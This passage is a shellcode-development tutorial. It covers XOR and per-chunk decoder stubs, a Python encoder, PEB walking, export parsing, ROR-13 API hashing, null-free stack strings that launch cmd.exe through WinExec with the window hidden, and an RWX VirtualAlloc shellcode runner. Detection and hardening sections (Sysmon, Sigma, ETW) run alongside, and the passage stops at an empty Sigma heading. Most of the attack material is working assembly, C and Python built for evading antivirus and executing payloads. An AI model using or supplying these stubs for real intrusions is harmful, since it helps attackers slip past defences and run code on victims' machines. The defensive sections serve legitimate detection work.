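    ; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
    ; ESI = read pointer (from JMP-CALL-POP), EDI = write pointer. Decoded bytes
    ; are compacted over the blob so key bytes are not left between instructions.
    ; Assumes the direction flag is clear.
    mov edi, esi            ; write pointer starts at the blob
    mov ebx, esi            ; remember where the decoded code begins
    decode_chunk:
    lodsb                   ; AL = key for this chunk, ESI++
    mov dl, al              ; keep the key in DL
    lodsb                   ; AL = data byte 0
    xor al, dl
    stosb                   ; store decoded byte, EDI++
    lodsb                   ; AL = data byte 1
    xor al, dl
    stosb
    cmp byte [esi], 0x90    ; end-marker (raw, unencoded NOP)?
    jne decode_chunk
    jmp ebx                 ; first decoded byte

| Scheme | Pro | Con |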
|---|---|---|
| Fixed single key | Smallest stub; one xor per byte | Fails when bad-char set is dense |
| Per-chunk key | Survives tight bad-char sets | Larger blob (one key byte per chunk); bigger stub |
The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.
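The encoder side of this scheme is short enough to sketch. The version below assumes two-byte chunks and a raw 0x90 marker, matching the decoder layout above, and refuses 0x90 as a key so the marker check cannot fire early; `decode_chunks` is only a Python model used to verify the round trip, and all names are illustrative.

```python
from typing import Optional

MARKER = 0x90   # raw end-marker, matching the decoder's `cmp byte [esi], 0x90`


def chunk_key(chunk: bytes, bad: set) -> Optional[int]:
    """First key that is not bad, is not the marker, and encodes chunk cleanly."""
    for key in range(1, 256):
        if key in bad or key == MARKER:
            continue
        if all((b ^ key) not in bad for b in chunk):
            return key
    return None


def encode_chunks(shellcode: bytes, bad: set, n: int = 2) -> bytes:
    """Emit [key][n data bytes] per chunk, then the marker."""
    if len(shellcode) % n:
        raise ValueError("pad the payload to a multiple of the chunk size")
    if MARKER in bad:
        raise ValueError("marker byte is itself a bad character")
    out = bytearray()
    for i in range(0, len(shellcode), n):
        chunk = shellcode[i:i + n]
        key = chunk_key(chunk, bad)
        if key is None:
            raise ValueError(f"no clean key for chunk at offset {i}")
        out.append(key)
        out.extend(b ^ key for b in chunk)
    out.append(MARKER)
    return bytes(out)


def decode_chunks(blob: bytes, n: int = 2) -> bytes:
    """Python model of the decoder loop, used only to verify the encoding."""
    out, i = bytearray(), 0
    while blob[i] != MARKER:          # marker is checked at key positions only
        key = blob[i]
        out.extend(b ^ key for b in blob[i + 1:i + 1 + n])
        i += 1 + n
    return bytes(out)


if __name__ == "__main__":
    # The benign exit(0) stub from Section 4.
    sc = bytes([0x31, 0xC0, 0xB0, 0x01, 0x31, 0xDB, 0xCD, 0x80])
    blob = encode_chunks(sc, {0x00, 0x0A, 0x0D})
    assert decode_chunks(blob) == sc
    print(blob.hex())
```

An encoded data byte may still equal 0x90 without harm, because the decoder only tests for the marker where a key is expected.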
8. Stack-Based Decoding
In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.
decoder:
pop esi ; ESI -> encoded payload
sub esp, 0x200 ; reserve 512 bytes of scratch
mov edi, esp ; EDI -> destination buffer
xor edx, edx ; offset = 0
copy_decode:
mov al, [esi + edx] ; fetch encoded byte
cmp al, 0xcc ; raw end-marker?
je run
xor al, 0xaa ; decode with key
mov [edi + edx], al ; write to stack
inc edx
jmp copy_decode
run:
jmp edi ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest: you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).
9. shikata_ga_nai: the State of the Art
The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:
- Chained, self-modifying key. Each decoded 4-byte block feeds into the key used for the next. Get one block or the initial key wrong and the whole tail decodes to noise, which also frustrates partial emulation.
- Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source are hard to pin with a single static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fnstenv [esp-0xc] to recover EIP without a tell-tale CALL, a deliberate jab at emulators that don’t model the FPU.
You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.
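The feedback idea is easier to reason about with a toy model. The sketch below is not Metasploit's implementation; it is a simplified additive-feedback XOR over 32-bit little-endian blocks, with made-up function names, meant only to show why one wrong key corrupts everything after it.

```python
import struct

MASK32 = 0xFFFFFFFF


def feedback_encode(plain: bytes, key: int) -> bytes:
    """Toy additive-feedback XOR over little-endian 32-bit blocks."""
    if len(plain) % 4:
        raise ValueError("pad the input to a multiple of 4 bytes")
    out = bytearray()
    for (block,) in struct.iter_unpack("<I", plain):
        out += struct.pack("<I", block ^ key)
        key = (key + block) & MASK32        # feedback: plaintext updates the key
    return bytes(out)


def feedback_decode(encoded: bytes, key: int) -> bytes:
    """Inverse of feedback_encode, given the same starting key."""
    out = bytearray()
    for (block,) in struct.iter_unpack("<I", encoded):
        plain = block ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK32        # same update, using the decoded block
    return bytes(out)


if __name__ == "__main__":
    data = bytes(range(16))
    enc = feedback_encode(data, 0x11223344)
    print(feedback_decode(enc, 0x11223344) == data)   # correct key round-trips
    print(feedback_decode(enc, 0x11223345) == data)   # one-bit key error does not
```

Because the key schedule depends on the plaintext, an analyst cannot decode a block in the middle without first decoding everything before it, which is the property the "chained key" bullet describes.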
10. Detection and Defense: What the Blue Team Sees
The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).
| Behavior | What it reveals |
|---|---|
| Tight xor/inc/loop over a code region | Classic fixed-key decoder stub |
| Region transitions writable → executable | Decoded payload about to run |
| Execution from unbacked memory | Code with no file on disk behind it |
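As a triage aid, the two heuristics reduce to a filter over a process's memory map. The sketch below assumes a simplified, hypothetical `Region` record; real scanners such as pe-sieve or Moneta work from the live process and apply many more checks.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Region:
    """Hypothetical, simplified view of one committed memory region."""
    base: int
    size: int
    protection: str                 # e.g. "R", "RW", "RX", "RWX"
    backing_file: Optional[str]     # None when no image on disk backs it


def suspicious_regions(regions: List[Region]) -> List[Region]:
    """Keep regions that are executable and either writable or unbacked."""
    hits = []
    for r in regions:
        executable = "X" in r.protection
        writable = "W" in r.protection
        unbacked = r.backing_file is None
        if executable and (writable or unbacked):
            hits.append(r)
    return hits
```

Expect false positives from JIT engines and some packers, which legitimately create writable-executable or unbacked code, so treat a hit as a lead to investigate, not a verdict.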
Sysmon Event IDs
| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Loader/injector process spawn |
| 7 | Image Loaded | DLLs from temp/download paths into system processes |
| 8 | CreateRemoteThread | Thread created in another process; low-volume, high-signal |
| 10 | ProcessAccess | Cross-process memory access; inspect GrantedAccess and CallTrace |
| 25 | ProcessTampering | In-memory image diverges from disk (hollowing / in-memory decode) |
Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.
Sigma Rule
title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory: no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
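To make the GrantedAccess values in the rule less opaque, here is a minimal sketch that expands a mask into the documented process access rights. The helper names are hypothetical, and the table covers only the rights relevant here, not the full set.

```python
# Documented process access rights (subset, values from winnt.h).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Rights a classic allocate/write/start-thread injection needs together.
INJECTION_RIGHTS = 0x0008 | 0x0020 | 0x0002


def decode_granted_access(mask: int) -> list:
    """List the known rights set in a GrantedAccess mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def injection_capable(mask: int) -> bool:
    """True when the mask allows VM operation, VM write and thread creation."""
    return (mask & INJECTION_RIGHTS) == INJECTION_RIGHTS


for value in (0x147A, 0x1410):
    print(hex(value), injection_capable(value), decode_granted_access(value))
```

Read this way, 0x147a carries everything a remote-thread injection needs, while 0x1410 is a query-and-read mask with no write or thread-creation rights.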
ETW providers
| Provider | Purpose |
|---|---|
| Microsoft-Windows-Threat-Intelligence | Kernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs |
| Microsoft-Windows-Security-Auditing | Event ID 4688 process creation with command line |
| AMSI | Inspects script content after deobfuscation, before execution |
Hardening
- bcdedit /set nx AlwaysOn: system-wide DEP/NX blocks execution of decoded stack/heap output.
- Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy: forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
- Code Integrity Guard (CIG) via ProcessSignaturePolicy: blocks unsigned image loads.
- Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
- Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons, which find the residue a decoded payload leaves behind.

11. Tools
| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86/x64 decoder stubs | nasm.us |
| GDB + pwndbg | Single-step the decode loop, inspect ESI/ECX | gdb.gnu.org |
| objdump / objcopy | Disassemble stubs, extract .text bytes | gnu.org |
| Capstone | Programmatic opcode audit for bad chars | capstone-engine.org |
| pwntools | Encoder/exploit automation (pwnlib.encoders) | docs.pwntools.com |
| pe-sieve / Moneta | Scan live processes for RWX / unbacked memory | github.com |
| Sysmon | Endpoint telemetry for Event IDs 8, 10, 25 | learn.microsoft.com |
12. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Obfuscated Files or Information | T1027 | Entropy/structure anomalies; encoded blob with decoder prefix |
| Encrypted/Encoded File | T1027.013 | Static scan for XOR-loop stub patterns near high-entropy data |
| Deobfuscate/Decode Files or Information | T1140 | Self-modifying memory; ACG violations; ETW VirtualProtect |
| Process Injection | T1055 | Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN |
| PE Injection | T1055.002 | Shellcode written into another process; RWX region creation |
| Reflective Code Loading | T1620 | Execution from unbacked memory; pe-sieve / Moneta |
Summary
- XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
- The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
- The stub’s own opcodes must be bad-char-clean too: audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
- Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
- Defenders ignore the shifting bytes and hunt the behavior: self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.
Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.
1. What Makes Code Position-Dependent?
A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.
Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.
The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).
2. The Problem with the IAT
A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA], an indirect call through a slot the loader populated. Shellcode cannot do this:
- It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
- It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
- It cannot rely on Windows syscall numbers either: those numbers are not a stable ABI and shift between builds.
The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).
3. Windows Memory Layout Primer: TEB, PEB, and the Loader
Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:
| Architecture | Instruction | Result |
|---|---|---|
| x86 | MOV EAX, FS:[0x30] | EAX ← TEB.ProcessEnvironmentBlock (PEB) |
| x64 | MOV RAX, GS:[0x60] | RAX ← TEB.ProcessEnvironmentBlock (PEB) |
From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.
Relevant offsets (Windows 10/11):
| Struct | Field | x86 offset | x64 offset |
|---|---|---|---|
| _TEB | ProcessEnvironmentBlock | +0x030 | +0x060 |
| _PEB | Ldr | +0x00C | +0x018 |
| _PEB_LDR_DATA | InLoadOrderModuleList | +0x00C | +0x010 |
| _PEB_LDR_DATA | InMemoryOrderModuleList | +0x014 | +0x020 |
| _PEB_LDR_DATA | InInitializationOrderModuleList | +0x01C | +0x030 |
| _LDR_DATA_TABLE_ENTRY | DllBase | +0x018 | +0x030 |
| _LDR_DATA_TABLE_ENTRY | BaseDllName | +0x02C | +0x058 |
Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.
// Conceptual layout: fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;            // +0x00
    LIST_ENTRY InMemoryOrderLinks;          // +0x10 (x64)
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;                          // +0x30 (x64)
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
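The x64 offsets can be cross-checked without a debugger by modelling the structure with fixed-width fields. The sketch below is a minimal model, assuming a 64-bit host whose ctypes alignment rules match the Windows x64 layout; the `...64` class names are made up for this example and only the fields shown above are modelled.

```python
import ctypes


class LIST_ENTRY64(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint64), ("Blink", ctypes.c_uint64)]


class UNICODE_STRING64(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_uint64)]  # pointer, padded to 8-byte alignment


class LDR_DATA_TABLE_ENTRY64(ctypes.Structure):
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY64),
                ("InMemoryOrderLinks", LIST_ENTRY64),
                ("InInitializationOrderLinks", LIST_ENTRY64),
                ("DllBase", ctypes.c_uint64),
                ("EntryPoint", ctypes.c_uint64),
                ("SizeOfImage", ctypes.c_uint32),
                ("FullDllName", UNICODE_STRING64),
                ("BaseDllName", UNICODE_STRING64)]


entry = LDR_DATA_TABLE_ENTRY64
print("DllBase            ", hex(entry.DllBase.offset))
print("BaseDllName        ", hex(entry.BaseDllName.offset))
# A pointer taken from InMemoryOrderModuleList lands on InMemoryOrderLinks,
# not on the start of the entry, so field offsets shrink by that amount.
print("DllBase from links ", hex(entry.DllBase.offset - entry.InMemoryOrderLinks.offset))
```

The last line is the figure that matters when walking InMemoryOrderModuleList: the list pointer is already 0x10 bytes into the entry, so DllBase sits at a smaller displacement than the table's struct-relative offset.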
4. Walking the Module List to Find kernel32.dll
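The loader populates InMemoryOrderModuleList in a predictable order on a typical process: the main executable first, then ntdll.dll, then kernel32.dll. (InInitializationOrderModuleList omits the executable, and on Windows 7 and later it lists kernelbase.dll ahead of kernel32.dll, so the same shortcut does not carry over to that list.) A common shortcut is to grab the third entry’s DllBase without ever comparing a name: fewer bytes, no strings, no signatures.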
; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address
xor rcx, rcx
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18] ; RAX = PEB->Ldr
mov rax, [rax + 0x20] ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
mov rax, [rax] ; 2nd entry: ntdll.dll
mov rax, [rax] ; 3rd entry: kernel32.dll
mov rbx, [rax + 0x20] ; LDR_DATA_TABLE_ENTRY.DllBase
; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:
; x86 — same walk, FS-relative
xor ecx, ecx
mov eax, [fs:ecx + 0x30] ; EAX = PEB
mov eax, [eax + 0x0C] ; PEB->Ldr
mov eax, [eax + 0x14] ; InMemoryOrderModuleList.Flink
mov eax, [eax] ; 2nd
mov eax, [eax] ; 3rd (kernel32)
mov ebx, [eax + 0x10] ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.
5. Parsing the PE Export Directory
Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:
ImageBase
└─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
    └─► IMAGE_NT_HEADERS
        └─► OptionalHeader.DataDirectory[0] ; EXPORT
            └─► IMAGE_EXPORT_DIRECTORY
                ├─ NumberOfNames
                ├─ AddressOfNames (RVA → name RVAs)
                ├─ AddressOfNameOrdinals (RVA → ordinal table)
                └─ AddressOfFunctions (RVA → function RVAs)

AddressOfNames and AddressOfNameOrdinals are parallel arrays: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o then indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.
; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
mov eax, dword [rbx + 0x3C] ; DOS.e_lfanew
lea rdx, [rbx + rax] ; RDX -> IMAGE_NT_HEADERS
mov eax, dword [rdx + 0x88] ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
lea rcx, [rbx + rax] ; RCX -> IMAGE_EXPORT_DIRECTORY
mov r8d, dword [rcx + 0x18] ; NumberOfNames
mov r9d, dword [rcx + 0x20] ; AddressOfNames (RVA)
mov r10d, dword [rcx + 0x24] ; AddressOfNameOrdinals
mov r11d, dword [rcx + 0x1C] ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].
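The lookup is easier to follow on a toy table. The sketch below models the three export arrays as Python lists and compares names directly instead of hashes, purely to keep the ordinal indirection visible. Every value in it (image base, names, ordinals, RVAs) is invented for illustration.

```python
def resolve_export(image_base, names, ordinals, functions, wanted):
    """Mimic the export walk: name index -> ordinal -> function RVA -> address."""
    for i, name in enumerate(names):
        if name == wanted:
            return image_base + functions[ordinals[i]]
    return None  # name not exported


# Hypothetical export table: names are sorted, functions are not.
IMAGE_BASE = 0x7FF800000000
NAMES = ["AcquireSRWLockExclusive", "GetProcAddress", "LoadLibraryA"]
ORDINALS = [2, 0, 1]                  # parallel to NAMES
FUNCTIONS = [0x1A2B0, 0x1F400, 0x20C10]  # indexed by ordinal, not by name index

addr = resolve_export(IMAGE_BASE, NAMES, ORDINALS, FUNCTIONS, "GetProcAddress")
print(hex(addr))
```

Indexing FUNCTIONS with the name index instead of the ordinal is the classic bug in hand-written resolvers; in this toy table it would return the wrong function for every name.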

6. Function Name Hashing (ROR-13)
Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:
// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13)); // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}
// Pre-computed constants for this routine (recompute for your toolchain):
// LoadLibraryA -> 0xEC0E4E8E
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess -> 0x73E2D87E
// VirtualAlloc -> 0x91AFCA54
// (0x0726774C, often quoted for LoadLibraryA, is the Metasploit block_api
// value, which also folds in a hash of the module name.)

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver: no strings, no absolute addresses, no relocations.
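For regenerating or checking such constants, including when writing YARA or other detections that key on them, a short Python port of the same routine is handy. This is a sketch of the rotate-then-add variant described above; the function names are my own.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Rotate the accumulator right by 13, then add the next byte."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + byte) & 0xFFFFFFFF
    return h


for api in ("LoadLibraryA", "GetProcAddress", "ExitProcess", "VirtualAlloc", "WinExec"):
    print(f"{api:<16} 0x{ror13_hash(api):08X}")
```

Hashing the function name alone gives 0xEC0E4E8E for LoadLibraryA. Schemes that also fold in a hash of the module name, as Metasploit's block_api does, produce different values for the same API, so constants from different stubs are not interchangeable.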
7. RIP-Relative Addressing and the CALL/POP Trick
When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.
x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:
lea rcx, [rel api_hash_table] ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:
call get_eip
get_eip:
pop ebp ; EBP = address of this instruction
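; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP. Note that a CALL to the very next instruction encodes as E8 00 00 00 00, so null-sensitive payloads use the JMP-CALL-POP arrangement instead, where the CALL jumps backward and its negative displacement contains no zero bytes.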
8. Stack Strings and Null-Byte Elimination
Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.
Construct strings on the stack by pushing immediates:
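; Build "cmd.exe\0" on the stack (8 bytes including NUL)
; A bare 7-byte immediate (0x6578652E646D63) assembles to an imm64 whose top byte
; is 0x00, so a filler byte is loaded in its place and shifted out afterwards.
mov rax, 0x416578652E646D63 ; 'cmd.exe' plus filler 'A' in the top byte (little-endian)
shl rax, 8 ; push the filler out of the register...
shr rax, 8 ; ...leaving 0x00 in the top byte as the terminator
push rax
mov rcx, rsp ; RCX -> "cmd.exe\0", first arg for WinExec

Eliminate accidental nulls in opcodes: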
| Avoid | Use instead | Reason |
|---|---|---|
| mov rax, 0 (48 C7 C0 00 00 00 00) | xor rax, rax | Removes four NUL bytes |
| push 0 (6A 00) | xor reg, reg; push reg | 6A 00 contains a NUL |
| Short jumps spanning NUL displacements | Pad with nop or reorder code | Avoids NUL in the offset byte |
| mov al, 0x00 | xor al, al | Same fix at byte width |
Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.
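The same audit applies to the immediates used for stack strings. Here is a minimal sketch, with hypothetical helper names, that packs a short ASCII string into the qword a mov reg, imm64 would carry and reports whether that immediate contains a zero byte.

```python
import struct


def stack_string_qword(text: str) -> int:
    """Pack up to 8 ASCII bytes into the little-endian qword pushed on the stack."""
    raw = text.encode("ascii")
    if len(raw) > 8:
        raise ValueError("one qword holds at most 8 bytes")
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


def has_null(imm64: int) -> bool:
    """True if the 8-byte immediate, as encoded in the instruction, contains 0x00."""
    return 0 in struct.pack("<Q", imm64)


for s in ("cmd.exe", "calc.exe"):
    q = stack_string_qword(s)
    print(f"{s!r:<12} 0x{q:016X} null={has_null(q)}")
```

A seven-character string such as cmd.exe leaves the top byte of the immediate zero, so the imm64 itself carries a NUL. An eight-character string fills the qword and needs its terminator supplied separately.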
9. x64 ABI Constraints: Shadow Space and Alignment
Windows x64 imposes two rules shellcode authors get wrong constantly:
- RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
- The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.
The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.
; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
; Assumes the string built earlier is still at the top of the stack.
mov rcx, rsp ; RCX -> "cmd.exe", captured before RSP is realigned
and rsp, -16 ; force 16-byte alignment (moves RSP by an unknown 0-15 bytes,
             ; so a fixed [rsp + N] taken afterwards would be unreliable)
sub rsp, 32 ; shadow space (home space)
xor edx, edx ; uCmdShow = SW_HIDE (0)
call rax ; WinExec
add rsp, 32 ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION on an aligned SSE move (movaps / movdqa) inside kernel32 or ntdll, a tell-tale crash signature when reviewing payloads.
10. Extraction and Controlled Testing
Once assembled with NASM, raw bytes are extracted from the COFF object and audited:
nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

A quick Python harness sanity-checks the extracted blob: it reports the size, flags embedded nulls, and dumps a C array for the test loader:
# verify.py: sanity-check a raw shellcode blob
with open("payload.bin", "rb") as f:
    data = f.read()
print(f"[+] size: {len(data)} bytes")
null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")
# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing. This is the educational sandbox, not a cross-process injector:
// test_runner.cpp: local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t sc_len;
int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL) return 1; // allocation failed
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walking | Resolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports |
| Export hash resolution | ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings |
| Stack strings | Push immediates to materialise "cmd.exe", "WinExec", etc., on the stack |
| Reflective loading | PIC stub maps a full DLL into memory and calls its DllMain (T1620) |
| Remote injection | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID |
| APC queuing | QueueUserAPC to deliver shellcode into an alertable thread |
| Process hollowing | Suspend a benign process, unmap its image, write PIC payload, resume |
| Module stomping | Overwrite the .text of a legitimately loaded DLL with PIC shellcode |
12. Defensive Strategies & Detection
PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.
Sysmon Event IDs to monitor:
| Event ID | Signal |
|---|---|
| 1 | Process creation (with command line); watch for anomalous parents (winword.exe → cmd.exe) |
| 7 | ImageLoad from user-writable paths into system processes |
| 8 | CreateRemoteThread: primary remote-injection signal |
| 10 | ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD |
| 17/18 | Named pipe creation/connection (common C2 channel) |
| 25 | ProcessTampering (image hollowing) |
ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.
Sigma sketch — cross-process handle access for injection:
